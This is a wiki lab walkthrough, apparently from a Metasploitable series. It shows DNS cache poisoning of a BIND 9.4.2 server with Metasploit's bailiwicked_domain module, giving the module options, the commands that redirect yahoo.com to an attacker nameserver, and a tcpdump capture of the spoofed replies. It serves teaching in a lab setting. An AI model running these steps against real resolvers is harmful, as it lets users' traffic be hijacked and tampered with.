Searching for Exploits

Searching for exploits of the DNS service that is running, ISC BIND 9.4.2, we find the following exploit: https://www.exploit-db.com/exploits/6122/

This exploit is labeled auxiliary/spoof/dns/bailiwicked_domain. It allows us to insert malicious DNS records into the DNS server.

DNS Exploit: bailiwicked domain

We can use this exploit by running:

msf > use auxiliary/spoof/dns/bailiwicked_domain

More information:

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver.  This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain.  By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache.  This insertion completely replaces the original nameserver
records for the target domain.

To interpret:

• Metasploit induces the target nameserver to ask for information from a target domain. It then gathers information about the responses to craft its attack.
• Metasploit then induces the target nameserver to ask for random subdomains at the target domain, and sends fake responses from the target domain back to the target nameserver in an attempt to confuse the target nameserver.
• When the attack/spoofing is successful, the target nameserver will receive a new authority server record (faked by Metasploit), and will insert this new record into its DNS cache.
• This means the target nameserver has a new DNS record for the target domain, containing whatever DNS servers were set in the Metasploit attack.
• Now, anyone requesting the target domain from the target nameserver will actually be routed to your (malicious) nameserver, where you can tamper with the request before forwarding it along.

Doing It

Metasploit

We can set up the attack by setting the remote host and the various options through Metasploit.

Start by loading the exploit and showing the available options:

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > show options

Module options (auxiliary/spoof/dns/bailiwicked_domain):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     example.com      yes       The domain to hijack
   INTERFACE                   no        The name of the interface
   NEWDNS                      yes       The hostname of the replacement DNS server
   RECONS     208.67.222.222   yes       The nameserver used for reconnaissance
   RHOST                       yes       The target address
   SNAPLEN    65535            yes       The number of bytes to capture
   SRCADDR    Real             yes       The source address to use for sending the queries (Accepted: Real, Random)
   SRCPORT                     yes       The target server's source query port (0 for automatic)
   TIMEOUT    500              yes       The number of seconds to wait for new data
   TTL        33918            yes       The TTL for the malicious host entry
   XIDS       0                yes       The number of XIDs to try for each query (0 for automatic)

msf auxiliary(bailiwicked_domain) >

The default recons dns server is an OpenDNS server: http://whatismyipaddress.com/ip/208.67.222.222

msf auxiliary(bailiwicked_domain) > set DOMAIN yahoo.com
DOMAIN => yahoo.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set RHOST 10.0.0.27
RHOST => 10.0.0.27
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) >

Locked and loaded.

Here's the before:

msf auxiliary(bailiwicked_domain) > dig +short -t ns yahoo.com @10.0.0.27
[*] exec: dig +short -t ns yahoo.com @10.0.0.27

ns6.yahoo.com.
ns1.yahoo.com.
ns4.yahoo.com.
ns5.yahoo.com.
ns2.yahoo.com.
ns3.yahoo.com.
msf auxiliary(bailiwicked_domain) >

Let's rock:

msf auxiliary(bailiwicked_domain) > run

Tcpdump

Watching in another window with tcpdump, we can see a steady flow of DNS queries:

# tcpdump -i eth0

[...]

23:55:27.992636 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108)
23:55:27.993049 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108)
23:55:27.993480 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108)
23:55:27.993894 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108)
23:55:27.994786 IP morpheus.48140 > 10.0.0.27.domain: 38614+ A? pnJt2DO12GBApJy9.yahoo.com. (44)
23:55:27.995487 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.995909 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.996341 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.996721 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2421896:2426028, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132
23:55:27.996786 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2426028:2430160, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132
23:55:27.996962 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.997090 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2430160:2434292, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132
23:55:27.997216 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2434292:2438424, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132
23:55:27.997507 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2438424:2442556, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132
23:55:27.997642 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.997760 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2442556:2446688, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132
23:55:27.997929 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2446688:2454952, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 8264
23:55:27.998195 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:28.000837 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], seq 2454952:2472328, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 17376
23:55:28.000880 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], seq 2472328:2492600, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 20272
23:55:28.000921 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2492600:2508844, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 16244
23:55:28.001045 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2508844:2509476, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387139], length 632
23:55:28.001580 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.002006 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.002424 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.002846 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.003133 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], ack 1549, win 46, options [nop,nop,TS val 64578983 ecr 902387140], length 0

[...]

23:55:28.366030 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.366489 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.366923 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.367362 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.367799 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.368372 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.368807 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.369263 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.369698 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.370140 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.370571 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.371137 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.371576 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.372018 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.372453 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.372889 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.373348 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.374282 IP morpheus.19248 > 10.0.0.27.domain: 32177+ A? oTdkBDSfM4iZG6.yahoo.com. (42)
23:55:28.375022 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.375462 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.375897 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.376339 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.376772 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.377226 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.377782 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (105)
23:55:28.378224 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (105)

Flags

Metasploit any and all resources related to metasploit on this wiki MSF - on the metasploit framework generally Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload. Category:Security  · Category:Metasploit  · Category:Kali Flags  · Template:MetasploitFlag  · e

Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack. Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres Metasploitable Networking: Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing /etc/shadow File: Metasploitable/John Shadow File Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind Metasploitable Services: distcc: Metasploitable/distcc Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...) Fuzzing  · American Fuzzy Lop Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali Flags  · Template:MetasploitableRedTeamFlag  · e

Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions. Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping  · Metasploitable/Defenses/Detecting Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports Metasploitable Networking Defenses: Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali Flags  · Template:MetasploitableBlueTeamFlag  · e